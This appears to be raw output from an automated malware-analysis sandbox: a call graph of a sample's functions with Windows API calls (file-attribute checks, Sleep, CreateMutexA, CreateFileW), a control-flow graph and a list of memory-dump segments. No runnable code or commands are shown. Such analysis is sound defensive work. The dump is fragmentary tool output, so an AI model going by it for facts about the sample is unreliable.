RtlWakeAllConditionVariable 37471->37661 37474 6176d9 Concurrency::details::_TaskCollection::_ReleaseAlias 37472->37474 37662 617430 37472->37662 37475 61777f Concurrency::details::_TaskCollection::_ReleaseAlias 37474->37475 37476 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37474->37476 37475->37429 37477 6177a0 37476->37477 37479 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37478->37479 37480 61e576 37479->37480 37481 615c10 5 API calls 37480->37481 37482 61e581 37481->37482 37483 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37482->37483 37484 61e59c 37483->37484 37485 615c10 5 API calls 37484->37485 37486 61e5a7 37485->37486 37487 629280 2 API calls 37486->37487 37488 61e5ba 37487->37488 37675 628320 37488->37675 37490 61e5fc 37679 628220 37490->37679 37492 61e60d 37493 628320 2 API calls 37492->37493 37494 61e61e 37493->37494 37495 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37494->37495 37496 61e7cb 37495->37496 37497 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37496->37497 37498 61e7e0 37497->37498 37499 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37498->37499 37500 61e7f2 37499->37500 37501 61be30 11 API calls 37500->37501 37502 61e7fe 37501->37502 37503 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37502->37503 37504 61e813 37503->37504 37505 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37504->37505 37506 61e82b 37505->37506 37507 615c10 5 API calls 37506->37507 37508 61e832 37507->37508 37509 618580 2 API calls 37508->37509 37510 61e83e 37509->37510 37511 61ea8f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias 37510->37511 37512 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37510->37512 37511->37420 37513 61eabd 37512->37513 37514 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37513->37514 37515 61eac2 37514->37515 37516 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37515->37516 37517 61eb19 37516->37517 37518 615c10 5 API calls 37517->37518 37519 61eb21 37518->37519 37687 6283c0 37519->37687 37521 61eb36 37522 628220 2 API calls 37521->37522 37523 61eb45 GetFileAttributesA 37522->37523 37525 61eb62 37523->37525 37526 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37525->37526 37527 61ed60 37526->37527 37528 615c10 5 API calls 37527->37528 37529 61ed68 37528->37529 37530 6283c0 2 API calls 37529->37530 37531 61ed7d 37530->37531 37532 628220 2 API calls 37531->37532 37533 61ed8c GetFileAttributesA 37532->37533 37537 61eda9 37533->37537 37535 61f699 Concurrency::details::_TaskCollection::_ReleaseAlias 37535->37420 37536 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37536->37537 37537->37535 37537->37536 37538 61f6cb 37537->37538 37539 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37538->37539 37540 61f6d0 37539->37540 37541 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37540->37541 37542 61f727 37541->37542 37543 615c10 5 API calls 37542->37543 37544 61f72e 37543->37544 37545 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37544->37545 37546 61f741 37545->37546 37547 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37546->37547 37548 61f756 37547->37548 37549 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37548->37549 37550 61f76b 37549->37550 37551 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37550->37551 37552 61f77d 37551->37552 37553 61e530 11 API calls 37552->37553 37554 61f786 37553->37554 37555 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37554->37555 37556 61f7aa 37555->37556 37557 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37556->37557 37558 61f7ba 37557->37558 37559 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37558->37559 37560 61f7d7 37559->37560 37561 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37560->37561 37563 61f7f0 37561->37563 37562 61f982 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias 37562->37420 37563->37562 37564 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37563->37564 37565 61f9b0 37564->37565 37566 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37565->37566 37567 61fa04 37566->37567 37568 615c10 5 API calls 37567->37568 37569 61fa0b 37568->37569 37570 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37569->37570 37571 61fa1e 37570->37571 37572 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37571->37572 37573 61fa33 37572->37573 37574 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37573->37574 37575 61fa48 37574->37575 37576 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37575->37576 37577 61fa5a 37576->37577 37578 61e530 11 API calls 37577->37578 37580 61fa63 37578->37580 37579 61fb35 Concurrency::details::_TaskCollection::_ReleaseAlias 37579->37420 37580->37579 37581 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37580->37581 37582 61fb54 37581->37582 37583 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37582->37583 37584 61fba5 37583->37584 37695 619580 5 API calls 3 library calls 37584->37695 37586 61fbb4 37696 619230 5 API calls 3 library calls 37586->37696 37588 61fbc3 37589 628320 2 API calls 37588->37589 37590 61fbdb 37589->37590 37590->37590 37591 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37590->37591 37592 61fc8c 37591->37592 37593 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37592->37593 37594 61fca7 37593->37594 37595 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37594->37595 37596 61fcb9 37595->37596 37597 61c360 RtlAllocateHeap 37596->37597 37598 61fcc2 37597->37598 37599 646729 RtlAllocateHeap 37598->37599 37600 61fce1 37599->37600 37601 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37600->37601 37602 6205d4 37601->37602 37603 615c10 5 API calls 37602->37603 37604 6205db 37603->37604 37605 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37604->37605 37606 6205f1 37605->37606 37607 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37606->37607 37608 620609 37607->37608 37609 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37608->37609 37610 620621 37609->37610 37611 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37610->37611 37612 620633 37611->37612 37613 61e530 11 API calls 37612->37613 37615 62063c 37613->37615 37614 620880 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias 37614->37420 37615->37614 37616 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37615->37616 37617 6208d3 37616->37617 37618 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37617->37618 37619 620987 37618->37619 37620 615c10 5 API calls 37619->37620 37621 62098e 37620->37621 37622 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37621->37622 37623 6209a4 37622->37623 37624 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37623->37624 37625 6209bc 37624->37625 37626 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37625->37626 37627 6209d4 37626->37627 37628 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37627->37628 37629 6212e0 37628->37629 37630 61e530 11 API calls 37629->37630 37631 6212e9 37630->37631 37635 64667e ___scrt_is_nonwritable_in_current_image 37632->37635 37633 646685 37634 6475f6 __dosmaperr RtlAllocateHeap 37633->37634 37636 64668a 37634->37636 37635->37633 37637 6466a5 37635->37637 37650 646c5a RtlAllocateHeap ___std_exception_copy 37636->37650 37639 6466b7 37637->37639 37640 6466aa 37637->37640 37646 64a8c3 37639->37646 37641 6475f6 __dosmaperr RtlAllocateHeap 37640->37641 37645 646695 37641->37645 37643 6466c0 37644 6475f6 __dosmaperr RtlAllocateHeap 37643->37644 37643->37645 37644->37645 37645->37450 37647 64a8cf ___scrt_is_nonwritable_in_current_image CallUnexpected 37646->37647 37651 64a967 37647->37651 37649 64a8ea 37649->37643 37650->37645 37653 64a98a ___scrt_uninitialize_crt 37651->37653 37652 64d82f _unexpected RtlAllocateHeap 37654 64a9eb 37652->37654 37653->37652 37656 64a9d0 ___scrt_uninitialize_crt __wsopen_s 37653->37656 37655 64adf5 __freea RtlAllocateHeap 37654->37655 37655->37656 37656->37649 37657->37459 37658->37459 37659->37465 37660->37471 37661->37461 37663 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37662->37663 37664 617465 37663->37664 37665 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37664->37665 37666 617478 37665->37666 37667 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37666->37667 37668 617488 37667->37668 37669 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37668->37669 37670 61749d 37669->37670 37671 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37670->37671 37672 6174b2 37671->37672 37673 627a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37672->37673 37674 6174c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_TaskCollection::_ReleaseAlias 37673->37674 37676 628339 37675->37676 37677 62834d __InternalCxxFrameHandler 37676->37677 37697 628f40 2 API calls 4 library calls 37676->37697 37677->37490 37680 628292 37679->37680 37681 628248 37679->37681 37686 6282a1 __InternalCxxFrameHandler 37680->37686 37698 628f40 2 API calls 4 library calls 37680->37698 37681->37680 37682 628251 37681->37682 37683 629280 2 API calls 37682->37683 37685 62825a 37683->37685 37685->37492 37686->37492 37699 627760 37687->37699 37689 628439 37691 628454 __InternalCxxFrameHandler 37689->37691 37713 628f40 2 API calls 4 library calls 37689->37713 37692 6284a8 __InternalCxxFrameHandler 37691->37692 37714 628f40 2 API calls 4 library calls 37691->37714 37692->37521 37694 6284ee 37694->37521 37695->37586 37696->37588 37697->37677 37698->37686 37701 62777b 37699->37701 37712 627864 Concurrency::details::_TaskCollection::_ReleaseAlias std::_Rethrow_future_exception 37699->37712 37700 6278f1 37715 629270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37700->37715 37701->37700 37705 627811 37701->37705 37706 6277ea 37701->37706 37711 6277fb std::_Rethrow_future_exception 37701->37711 37701->37712 37703 6278f6 37716 612480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected 37703->37716 37708 62d3e2 Concurrency::details::SchedulerProxy::CreateExternalThreadResource 2 API calls 37705->37708 37705->37711 37706->37703 37709 62d3e2 Concurrency::details::SchedulerProxy::CreateExternalThreadResource 2 API calls 37706->37709 37707 6278fb 37708->37711 37709->37711 37710 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37710->37700 37711->37710 37711->37712 37712->37689 37713->37691 37714->37694 37716->37707 37745 64ac53 37750 64aa29 37745->37750 37748 64ac92 37751 64aa48 37750->37751 37752 64aa5b 37751->37752 37760 64aa70 37751->37760 37753 6475f6 __dosmaperr RtlAllocateHeap 37752->37753 37754 64aa60 37753->37754 37770 646c5a RtlAllocateHeap ___std_exception_copy 37754->37770 37756 64aa6b 37756->37748 37767 651a9c 37756->37767 37757 6475f6 __dosmaperr RtlAllocateHeap 37758 64ac41 37757->37758 37774 646c5a RtlAllocateHeap ___std_exception_copy 37758->37774 37765 64ab90 37760->37765 37771 65132b GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 37760->37771 37762 64abe0 37762->37765 37772 65132b GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 37762->37772 37764 64abfe 37764->37765 37773 65132b GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 37764->37773 37765->37756 37765->37757 37775 651461 37767->37775 37769 651ab7 37769->37748 37770->37756 37771->37762 37772->37764 37773->37765 37774->37756 37777 65146d ___scrt_is_nonwritable_in_current_image 37775->37777 37776 651474 37778 6475f6 __dosmaperr RtlAllocateHeap 37776->37778 37777->37776 37779 65149f 37777->37779 37780 651479 37778->37780 37784 651a2e 37779->37784 37793 646c5a RtlAllocateHeap ___std_exception_copy 37780->37793 37783 651483 __wsopen_s 37783->37769 37794 64698d 37784->37794 37786 651a50 37797 6468ed 37786->37797 37788 651a64 37791 651a96 37788->37791 37792 64adf5 __freea RtlAllocateHeap 37788->37792 37791->37783 37792->37791 37793->37783 37795 64690a __cftof 3 API calls 37794->37795 37796 64699f __wsopen_s 37795->37796 37796->37786 37842 64683b 37797->37842 37800 651abc 37859 65180a 37800->37859 37802 651ad9 37803 651b07 37802->37803 37804 651aee 37802->37804 37873 64bf3a 37803->37873 37878 6475e3 RtlAllocateHeap __dosmaperr 37804->37878 37807 651af3 37813 6475f6 __dosmaperr RtlAllocateHeap 37807->37813 37808 651b0c 37809 651b15 37808->37809 37810 651b2c 37808->37810 37879 6475e3 RtlAllocateHeap __dosmaperr 37809->37879 37877 651775 CreateFileW 37810->37877 37838 651b00 37813->37838 37814 651b1a 37815 6475f6 __dosmaperr RtlAllocateHeap 37814->37815 37815->37807 37816 651be2 GetFileType 37817 651c34 37816->37817 37818 651bed 37816->37818 37883 64be85 RtlAllocateHeap __dosmaperr __wsopen_s 37817->37883 37882 6475c0 RtlAllocateHeap __dosmaperr 37818->37882 37819 651bb7 37881 6475c0 RtlAllocateHeap __dosmaperr 37819->37881 37820 651b65 37820->37816 37820->37819 37880 651775 CreateFileW 37820->37880 37824 651baa 37824->37816 37824->37819 37826 651c55 37828 651ca1 37826->37828 37884 651984 4 API calls 2 library calls 37826->37884 37827 651bfb 37827->37807 37833 6475f6 __dosmaperr RtlAllocateHeap 37827->37833 37832 651ca8 37828->37832 37886 651522 4 API calls 3 library calls 37828->37886 37831 651cd6 37831->37832 37835 651ce4 37831->37835 37885 64af48 RtlAllocateHeap __dosmaperr __wsopen_s 37832->37885 37833->37807 37835->37838 37887 651775 CreateFileW 37835->37887 37837 651d8b 37837->37838 37888 6475c0 RtlAllocateHeap __dosmaperr 37837->37888 37838->37788 37840 651da1 37889 64c04d RtlAllocateHeap __dosmaperr __wsopen_s 37840->37889 37843 646863 37842->37843 37844 646849 37842->37844 37846 64686a 37843->37846 37848 646889 __fassign 37843->37848 37855 6469cc RtlAllocateHeap __freea 37844->37855 37854 646853 37846->37854 37856 6469e6 RtlAllocateHeap RtlAllocateHeap __wsopen_s 37846->37856 37849 64689f __fassign 37848->37849 37858 6469e6 RtlAllocateHeap RtlAllocateHeap __wsopen_s 37848->37858 37849->37854 37857 6475c0 RtlAllocateHeap __dosmaperr 37849->37857 37852 6468ab 37853 6475f6 __dosmaperr RtlAllocateHeap 37852->37853 37853->37854 37854->37788 37854->37800 37855->37854 37856->37854 37857->37852 37858->37849 37860 651845 37859->37860 37861 65182b 37859->37861 37890 65179a 37860->37890 37861->37860 37863 6475f6 __dosmaperr RtlAllocateHeap 37861->37863 37864 65183a 37863->37864 37897 646c5a RtlAllocateHeap ___std_exception_copy 37864->37897 37866 65187d 37867 6518ac 37866->37867 37869 6475f6 __dosmaperr RtlAllocateHeap 37866->37869 37872 6518fa ___std_exception_copy 37867->37872 37899 649b60 RtlAllocateHeap __dosmaperr ___std_exception_copy 37867->37899 37870 6518a1 37869->37870 37898 646c5a RtlAllocateHeap ___std_exception_copy 37870->37898 37872->37802 37875 64bf46 ___scrt_is_nonwritable_in_current_image CallUnexpected 37873->37875 37876 64bf77 __wsopen_s 37875->37876 37901 64bd14 RtlAllocateHeap __freea _unexpected __wsopen_s 37875->37901 37876->37808 37877->37820 37878->37807 37879->37814 37880->37824 37881->37807 37882->37827 37883->37826 37884->37828 37885->37838 37886->37831 37887->37837 37888->37840 37889->37838 37893 6517b2 37890->37893 37891 6517cd 37891->37866 37892 6475f6 __dosmaperr RtlAllocateHeap 37894 6517f1 37892->37894 37893->37891 37893->37892 37900 646c5a RtlAllocateHeap ___std_exception_copy 37894->37900 37896 6517fc 37896->37866 37897->37860 37898->37867 37899->37872 37900->37896 37901->37876 37902 61a079 GetFileAttributesA 37904 61a089 Concurrency::details::_TaskCollection::_ReleaseAlias 37902->37904 37903 61a930 37906 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37903->37906 37904->37903 37905 61a154 Concurrency::details::_TaskCollection::_ReleaseAlias 37904->37905 37908 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37905->37908 37907 61a953 Sleep CreateMutexA 37906->37907 37912 61a98e 37907->37912 37910 61a903 37908->37910 37911 61a9a7 37912->37911 37915 646629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 37912->37915 37914 61a9b0 37915->37914 37916 61a418 GetFileAttributesA 37917 61a428 Concurrency::details::_TaskCollection::_ReleaseAlias 37916->37917 37918 61a93f 37917->37918 37920 61a4f3 Concurrency::details::_TaskCollection::_ReleaseAlias 37917->37920 37919 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37918->37919 37921 61a944 37919->37921 37922 6280c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37920->37922 37923 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37921->37923 37925 61a903 37922->37925 37924 61a949 37923->37924 37926 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37924->37926 37927 61a94e 37926->37927 37928 61a953 Sleep CreateMutexA 37927->37928 37929 646c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37927->37929 37932 61a98e 37928->37932 37929->37928 37931 61a9a7 37932->37931 37935 646629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 37932->37935 37934 61a9b0 37935->37934 37950 646dda 37951 646df6 37950->37951 37952 646de8 37950->37952 37954 64698d __wsopen_s 3 API calls 37951->37954 37953 646e4c 9 API calls 37952->37953 37955 646df2 37953->37955 37956 646e10 37954->37956 37957 6468ed __wsopen_s 2 API calls 37956->37957 37959 646e1d 37957->37959 37958 646e24 37961 646e46 37958->37961 37962 64adf5 __freea RtlAllocateHeap 37958->37962 37959->37958 37963 646e4c 37959->37963 37962->37961 37964 646e77 Concurrency::details::ResourceManager::SetupStaticAllocationData 37963->37964 37965 646e5a 37963->37965 37968 646e9d 37964->37968 37969 646eb9 CreateFileW 37964->37969 38007 6475e3 RtlAllocateHeap __dosmaperr 37965->38007 37967 646e5f 37970 6475f6 __dosmaperr RtlAllocateHeap 37967->37970 38009 6475e3 RtlAllocateHeap __dosmaperr 37968->38009 37972 646edd 37969->37972 37973 646eeb 37969->37973 37974 646e67 37970->37974 37986 646fb4 GetFileType 37972->37986 38011 646f2a GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __dosmaperr 37973->38011 38008 646c5a RtlAllocateHeap ___std_exception_copy 37974->38008 37975 646ea2 37979 6475f6 __dosmaperr RtlAllocateHeap 37975->37979 37982 646ea9 37979->37982 37980 646ee6 Concurrency::details::ResourceManager::SetupStaticAllocationData 37984 646f1c CloseHandle 37980->37984 37985 646eb4 37980->37985 37981 646e72 37981->37958 38010 646c5a RtlAllocateHeap ___std_exception_copy 37982->38010 37984->37985 37985->37958 37987 6470a1 37986->37987 37988 646fef 37986->37988 37990 6470af 37987->37990 37995 647098 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37987->37995 37997 6470be 37987->37997 37994 647009 Concurrency::details::ResourceManager::SetupStaticAllocationData 37988->37994 38026 64732a RtlAllocateHeap __dosmaperr 37988->38026 37992 6475f6 __dosmaperr RtlAllocateHeap 37990->37992 37991 647028 GetFileInformationByHandle 37993 64703e 37991->37993 37991->37997 37992->37995 38012 64727c 37993->38012 37994->37991 37994->37995 37995->37980 38028 6475c0 RtlAllocateHeap __dosmaperr 37997->38028 38001 64705b 38002 647124 SystemTimeToTzSpecificLocalTime 38001->38002 38003 64706e 38002->38003 38004 647124 SystemTimeToTzSpecificLocalTime 38003->38004 38005 647085 38004->38005 38027 647249 RtlAllocateHeap __dosmaperr 38005->38027 38007->37967 38008->37981 38009->37975 38010->37985 38011->37980 38013 647292 _wcsrchr 38012->38013 38021 64704a 38013->38021 38029 64bc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 38013->38029 38015 6472d6 38015->38021 38030 64bc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 38015->38030 38017 6472e7 38017->38021 38031 64bc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 38017->38031 38019 6472f8 38019->38021 38032 64bc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 38019->38032 38022 647124 38021->38022 38023 64713c 38022->38023 38024 64715c SystemTimeToTzSpecificLocalTime 38023->38024 38025 647142 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 38023->38025 38024->38025 38025->38001 38026->37994 38027->37995 38028->37995 38029->38015 38030->38017 38031->38019 38032->38021

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 0061E530 Relevance: 25.5, APIs: 2, Strings: 12, Instructions: 998COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 438 61e530-61e843 call 627a00 call 615c10 call 627a00 call 615c10 call 629280 call 628320 call 628220 call 628320 call 627a00 * 3 call 61be30 call 627a00 * 2 call 615c10 call 618580 476 61ea1a-61ea62 438->476 477 61e8ce-61e9ec 438->477 476->477 480 61ea8f-61ea96 call 62d663 476->480 486 61e9f2-61e9fe 477->486 487 61ea99-61eab2 call 62cff1 477->487 480->487 486->480 488 61ea04-61ea12 486->488 488->476 490 61eab8-61eda3 call 646c6a * 2 call 627a00 call 615c10 call 6283c0 call 628220 GetFileAttributesA call 627a00 call 615c10 call 6283c0 call 628220 GetFileAttributesA 488->490 521 61eda9-61ee79 490->521 526 61f273-61f28b 521->526 527 61f5bb-61f66c call 6280c0 521->527 528 61f291-61f29d 526->528 529 61f6a3-61f6b6 526->529 527->526 532 61f699-61f6a0 call 62d663 527->532 531 61f2a3-61f2b1 528->531 528->532 531->527 534 61f6cb-61f962 call 646c6a call 627a00 call 615c10 call 627a00 * 4 call 61e530 call 6280c0 call 627a00 call 6280c0 * 2 531->534 532->529 570 61f964-61f970 534->570 571 61f98c-61f9a5 call 62cff1 534->571 573 61f982-61f989 call 62d663 570->573 574 61f972-61f980 570->574 573->571 574->573 576 61f9ab-61fb15 call 646c6a call 627a00 call 615c10 call 627a00 * 4 call 61e530 574->576 600 61fb17-61fb23 576->600 601 61fb3f-61fb4e 576->601 602 61fb35-61fb3c call 62d663 600->602 603 61fb25-61fb33 600->603 602->601 603->602 604 61fb4f-61fc6f call 646c6a call 627a00 call 619580 call 619230 call 628320 603->604 620 61fc70-61fc75 604->620 620->620 621 61fc77-620860 call 6280c0 call 627a00 * 2 call 61c360 call 646729 call 627a00 call 615c10 call 627a00 * 4 call 61e530 620->621 656 620862-62086e 621->656 657 62088a-6208a5 call 62cff1 621->657 658 620880-620887 call 62d663 656->658 659 620870-62087e 656->659 658->657 659->658 661 6208ce-6215f2 call 646c6a call 627a00 call 615c10 call 627a00 * 4 call 61e530 659->661
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
